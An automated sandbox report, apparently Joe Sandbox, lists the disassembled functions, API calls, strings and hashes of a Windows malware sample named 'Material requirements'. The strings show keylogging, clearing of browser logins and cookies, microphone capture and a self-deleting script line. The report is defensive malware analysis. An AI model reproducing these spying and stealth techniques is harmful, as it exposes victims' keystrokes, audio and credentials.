                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                        • String ID:
                        • API String ID: 3360349984-0
                        • Opcode ID: 54d56c26835f845e219b8fbcfbfaee96f182a1e2e5f8d4c6d7efe874cd7b3d0f
                        • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                        • Opcode Fuzzy Hash: 54d56c26835f845e219b8fbcfbfaee96f182a1e2e5f8d4c6d7efe874cd7b3d0f
                        • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                        Function 0040B806 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        • Cleared browsers logins and cookies., xrefs: 0040B8EF
                        • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                        • API String ID: 3472027048-1236744412
                        • Opcode ID: a560be4e93f7145764f14036b9ba5e851196c21c3d51501819e25b145e9be97c
                        • Instruction ID: 79c0b3a62e4074401f8092341c6d65849921352ddae30cadc40705057ad9e0e2
                        • Opcode Fuzzy Hash: a560be4e93f7145764f14036b9ba5e851196c21c3d51501819e25b145e9be97c
                        • Instruction Fuzzy Hash: FC31891564C3816ACA11777514167EB6F958A93754F0884BFF8C42B3E3DB7A480893EF
                        Function 00411524 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                          • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                          • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                        • Sleep.KERNEL32(00000BB8), ref: 004115C3
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenQuerySleepValue
                        • String ID: @CG$exepath$BG
                        • API String ID: 4119054056-3221201242
                        • Opcode ID: 7e871a5e45cf0c5aa995f5861383ecd3664757752265a40acd77ba434a7e4b44
                        • Instruction ID: 3bb97b322c4281cea59bb4e220ac43bd532ded5f68553a77fc2ada00b9ce30da
                        • Opcode Fuzzy Hash: 7e871a5e45cf0c5aa995f5861383ecd3664757752265a40acd77ba434a7e4b44
                        • Instruction Fuzzy Hash: EC21F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DF7D9D4581AD
                        Function 00409C4B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0041B6F6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B706
                          • Part of subcall function 0041B6F6: GetWindowTextLengthW.USER32(00000000), ref: 0041B70F
                          • Part of subcall function 0041B6F6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B739
                        • Sleep.KERNEL32(000001F4), ref: 00409C95
                        • Sleep.KERNEL32(00000064), ref: 00409D1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Window$SleepText$ForegroundLength
                        • String ID: [ $ ]
                        • API String ID: 3309952895-93608704
                        • Opcode ID: 98d6b66478057358495496a018cf8b974f91cae2485f626915356807bc928fff
                        • Instruction ID: 884b77faaa60fb736012887943be30d2742787962025037229812ea18f618e82
                        • Opcode Fuzzy Hash: 98d6b66478057358495496a018cf8b974f91cae2485f626915356807bc928fff
                        • Instruction Fuzzy Hash: 2E119F325042005BD218BB26DD17AAEB7A8AF50708F40047FF542221D3EF39AE1986DF
                        Function 0041B59F Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5FB
                        • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B60F
                        • CloseHandle.KERNEL32(00000000), ref: 0041B61C
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandlePointerWrite
                        • String ID:
                        • API String ID: 3604237281-0
                        • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                        • Instruction ID: 3b94612a358327762e597db0d4245ee78264fa841ead315e3e24d1cb8b3ec7b7
                        • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                        • Instruction Fuzzy Hash: 3F01F5712082147FE6104F28AC89EBB739DEB96379F14063AF952C22C0D765CC8596BE
                        Function 00442CE2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                        • Instruction ID: dab0b0a7df633c5b48e856b81aae527c8b914588f9bdc990e5f583acd93a84b2
                        • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                        • Instruction Fuzzy Hash: 5701F2F2A097163EF62116792CC0F6B670DDF413B9B31073BB921622E1EAE8CC42506C
                        Function 00442D61 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                        • Instruction ID: 297bbf4b6e7cb62aad9c1df2c980cfc74e2a715ef03096c7e716b38b90e38ed5
                        • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                        • Instruction Fuzzy Hash: 5401D1F2A096167EB7201A7A7DC0D67624EDF823B9371033BF421612D5EAA88C408179
                        Function 00438105 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0043811F
                          • Part of subcall function 0043806C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043809B
                          • Part of subcall function 0043806C: ___AdjustPointer.LIBCMT ref: 004380B6
                        • _UnwindNestedFrames.LIBCMT ref: 00438134
                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438145
                        • CallCatchBlock.LIBVCRUNTIME ref: 0043816D
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                        • String ID:
                        • API String ID: 737400349-0
                        • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                        • Instruction ID: b756294ed3ea81ca49fa364012696409ae819ba0eb544c37e892c8a1feda9a6f
                        • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                        • Instruction Fuzzy Hash: D7012D72100208BBDF126E96CC45DEB7B69EF4C758F04501DFE4866121C73AE862DBA4
                        Function 00447220 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue), ref: 00447252
                        • GetLastError.KERNEL32(?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446FA1), ref: 0044725E
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044726C
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad$ErrorLast
                        • String ID:
                        • API String ID: 3177248105-0
                        • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                        • Instruction ID: b3fe555fe56df17639c4036f58dc3a809bdc468a9df6621700516029eed46faf
                        • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                        • Instruction Fuzzy Hash: 0D01D432649323ABD7214B79BC44A5737D8BB05BA2B2506B1F906E3241D768D802CAE8
                        Function 0041B62A Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B657
                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B67C
                        • CloseHandle.KERNEL32(00000000), ref: 0041B68A
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleReadSize
                        • String ID:
                        • API String ID: 3919263394-0
                        • Opcode ID: 84c524a448c010b9be172ba78faf3346c00c98969e38f24d930284b8d2add881
                        • Instruction ID: 3f34627ebf18732c46889562bde790f52735f321db32931f0b6625c87776b378
                        • Opcode Fuzzy Hash: 84c524a448c010b9be172ba78faf3346c00c98969e38f24d930284b8d2add881
                        • Instruction Fuzzy Hash: 81F0F6B12053047FE6101B21BC85FBF375CDB967A5F00027EFC01A22D1DA658C4591BA
                        Function 0041851C Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                        Download Yara Rule
                        APIs
                        • GetSystemMetrics.USER32(0000004C), ref: 00418529
                        • GetSystemMetrics.USER32(0000004D), ref: 0041852F
                        • GetSystemMetrics.USER32(0000004E), ref: 00418535
                        • GetSystemMetrics.USER32(0000004F), ref: 0041853B
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: MetricsSystem
                        • String ID:
                        • API String ID: 4116985748-0
                        • Opcode ID: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                        • Instruction ID: f480d68fafb364c29fc67a5f666d93eee18e0abee54110dfc95006384cbaadd6
                        • Opcode Fuzzy Hash: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                        • Instruction Fuzzy Hash: 72F0D672B043256BCA00EA7A4C4156FAB97DFC46A4F25083FE6059B341DE78EC4647D9
                        Function 0041B38D Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3E3
                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3EB
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseHandleOpenProcess
                        • String ID:
                        • API String ID: 39102293-0
                        • Opcode ID: 5115dc8d21cc8ae304c84a9c6d3d66be3b1fde84125eb931853a25931357237b
                        • Instruction ID: d8943217945b3e3bc9c1dbf33fc4ac7f726da2cd485b5cd5dbfa96192dfeb6c9
                        • Opcode Fuzzy Hash: 5115dc8d21cc8ae304c84a9c6d3d66be3b1fde84125eb931853a25931357237b
                        • Instruction Fuzzy Hash: 67F04971204209ABD3026794AC4AFEBB26CDF44B96F000037FA11D22A2FF74CCC146A9
                        Function 00441EED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                        Download Yara Rule
                        APIs
                        • __startOneArgErrorHandling.LIBCMT ref: 00441F7D
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorHandling__start
                        • String ID: pow
                        • API String ID: 3213639722-2276729525
                        • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                        • Instruction ID: b0758be5652a64c1ac5d647a76b92dde9bac1040a8da8be5e5c84d6172790ea5
                        • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                        • Instruction Fuzzy Hash: E6515A61A0A20296F7117B14C98136F6B949B50741F288D6BF085823F9EF3DCCDB9A4E
                        Function 00420F7E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: _memcmp
                        • String ID: 4[G$4[G
                        • API String ID: 2931989736-4028565467
                        • Opcode ID: c0cf07660e95b0ee548887709ac0c844436c6f626d7fb978308fdfb467b77264
                        • Instruction ID: 33b36a833443cc607bae0a2c4f054eab59dd7b99d1d8389eb50a0704093c1055
                        • Opcode Fuzzy Hash: c0cf07660e95b0ee548887709ac0c844436c6f626d7fb978308fdfb467b77264
                        • Instruction Fuzzy Hash: E56110716047069AC714DF28D8406B3B7A8FF98304F44063EEC5D8F656E778AA25CBAD
                        Function 00414B9B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CountEventTick
                        • String ID: >G
                        • API String ID: 180926312-1296849874
                        • Opcode ID: d40a123c09f5dd7fc33c7c8b938888b13362624a47d2b00da105bfab6dfd1d1d
                        • Instruction ID: 080f125417303e5552765b07387c73e695832f87024c8a27cfac38d5c25ddd71
                        • Opcode Fuzzy Hash: d40a123c09f5dd7fc33c7c8b938888b13362624a47d2b00da105bfab6dfd1d1d
                        • Instruction Fuzzy Hash: 7E5191315042409AC224FB71D8A2AEF73E5AFD1314F40853FF94A671E2EF389949C69E
                        Function 0044DB44 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                        Download Yara Rule
                        APIs
                        • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB69
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Info
                        • String ID: $vD
                        • API String ID: 1807457897-3636070802
                        • Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                        • Instruction ID: 639e137743dbd1cdb094e6b6e994140176401b7572b89e22c1ac552797110b95
                        • Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                        • Instruction Fuzzy Hash: 6A411C709043889AEF218F24CCC4AF6BBF9DF45308F1404EEE58A87242D279AA45DF65
                        Function 004508EE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B49,?,00000050,?,?,?,?,?), ref: 004509C9
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ACP$OCP
                        • API String ID: 0-711371036
                        • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                        • Instruction ID: 0ee4350655218b6c75cd3052c0190142cf4d5733969cac988e1a0851f3347a37
                        • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                        • Instruction Fuzzy Hash: 832148EBA00100A6F7308F55C801B9773AAAB90B23F564426EC49D730BF73ADE08C358
                        Function 004049BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                        • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                        Strings
                        • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: LocalTime
                        • String ID: KeepAlive | Enabled | Timeout:
                        • API String ID: 481472006-1507639952
                        • Opcode ID: 55e8a268f478e9dd55dcba40bfbb0b748b5ff50574cd289cd160118e090ea358
                        • Instruction ID: 8fc2066b5dd234cef981570443e677007340a491061b3c72667858eadfbc0999
                        • Opcode Fuzzy Hash: 55e8a268f478e9dd55dcba40bfbb0b748b5ff50574cd289cd160118e090ea358
                        • Instruction Fuzzy Hash: EF2129A1A042806BC310FB6A980676B7B9457D1315F48417EF948532E2EB3C5999CB9F
                        Function 0041A696 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: LocalTime
                        • String ID: | $%02i:%02i:%02i:%03i
                        • API String ID: 481472006-2430845779
                        • Opcode ID: d3ffcd1d0ca88ff003ebf63de90cbb52a1477b8a5ce084a0fda1429b811f37a5
                        • Instruction ID: f196d4ed1927782274832919bda13c77b2b6189c6c06a517aeeeb96a95a688aa
                        • Opcode Fuzzy Hash: d3ffcd1d0ca88ff003ebf63de90cbb52a1477b8a5ce084a0fda1429b811f37a5
                        • Instruction Fuzzy Hash: 81114C725082045AC704EBA5D8568AF73E8EB94708F10053FFC85931E1EF38DA84C69E
                        Function 0040A767 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                          • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                        • CloseHandle.KERNEL32(?), ref: 0040A7CA
                        • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                        • String ID: Online Keylogger Stopped
                        • API String ID: 1623830855-1496645233
                        • Opcode ID: 441e50180230ba2ba05f386e367c5a536ce2e77025d1c3492b7828fca42d8fe8
                        • Instruction ID: 9ca866747e1af720c58b6b078daeda0145c7b5fd7bd766bf2ea1503866da158c
                        • Opcode Fuzzy Hash: 441e50180230ba2ba05f386e367c5a536ce2e77025d1c3492b7828fca42d8fe8
                        • Instruction Fuzzy Hash: 8101D431A043019BDB25BB35C80B7AEBBB19B45315F40407FE481275D2EB7999A6C3DB
                        Function 004016E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                        Download Yara Rule
                        APIs
                        • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B90,00473EE8,?,00000000,00401913), ref: 00401747
                        • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: wave$BufferHeaderPrepare
                        • String ID: T=G
                        • API String ID: 2315374483-379896819
                        • Opcode ID: 8fbe103bd9222016c2b4e2bc3eb0eb996b4ad057f7b910ac6b5a0adda4e0e2aa
                        • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                        • Opcode Fuzzy Hash: 8fbe103bd9222016c2b4e2bc3eb0eb996b4ad057f7b910ac6b5a0adda4e0e2aa
                        • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                        Function 004477A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • IsValidLocale.KERNEL32(00000000,z=D,00000000,00000001,?,?,00443D7A,?,?,?,?,00000004), ref: 004477EC
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: LocaleValid
                        • String ID: IsValidLocaleName$z=D
                        • API String ID: 1901932003-2791046955
                        • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                        • Instruction ID: b87742f2873dd73c0a7d5aade023b210d3410e3306d67f57874115e62e910f2b
                        • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                        • Instruction Fuzzy Hash: 72F0E930A45318F7DA106B659C06F5E7B54CF05711F50807BFD046A283CE796D0285DC
                        Function 00401D91 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: H_prolog
                        • String ID: T=G$T=G
                        • API String ID: 3519838083-3732185208
                        • Opcode ID: 138b4589fff14f79146b4c81e53a501c98e6cc4b2bf129928705b8782f8e57ab
                        • Instruction ID: f0e76400c825ed045590d0aed9209fb7c3a86c2d0af9b05bbbbea7315d156e8c
                        • Opcode Fuzzy Hash: 138b4589fff14f79146b4c81e53a501c98e6cc4b2bf129928705b8782f8e57ab
                        • Instruction Fuzzy Hash: 77F0E971A00221ABC714BB65C80569EB774EF4136DF10827FB416B72E1CBBD5D04D65D
                        Function 0040AD56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyState.USER32(00000011), ref: 0040AD5B
                          • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                          • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                          • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                          • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                          • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                          • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                          • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                          • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                        • String ID: [AltL]$[AltR]
                        • API String ID: 2738857842-2658077756
                        • Opcode ID: 3060760f9439b7e306d49c13d8f75930fa0495ce116598ddfd2946cd15ffa226
                        • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                        • Opcode Fuzzy Hash: 3060760f9439b7e306d49c13d8f75930fa0495ce116598ddfd2946cd15ffa226
                        • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                        Function 00448813 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                        Download Yara Rule
                        APIs
                        • _free.LIBCMT ref: 00448835
                          • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
